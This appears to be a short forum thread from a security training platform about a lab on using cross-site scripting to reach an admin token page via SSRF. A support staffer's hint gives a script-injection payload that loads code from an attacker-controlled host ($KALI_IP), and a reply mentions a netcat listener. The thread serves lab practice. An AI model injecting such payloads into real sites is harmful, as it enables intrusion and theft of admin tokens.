Forum Discussion
shubham
Bronze I
10 months agoCross-Site Scripting: Ep.6 – Further Exploitation
I was stuck in one question looking for HINT. Extend the XSS vulnerability to view the contents of the /admin/token page with SSRF.
- 9 months ago
johndoe321I changed the script to a different port to the one being bombarded and did another NC listener on that different port. Roled right in.
ChrisKershaw
Community Support
10 months agoHey shubham
Thank you for posting, and welcome to the Human Connection! I'm Chris, I work in the Customer Support Team, and I'll be happy to help you with your attempt 😊.
I'll be happy to share a hint to help you with your lab attempt:
In the Ask a Question page, add the following to the Message field: <script src="http://$KALI_IP/script.js" ></script>
Will you see if this helps you with your attempt?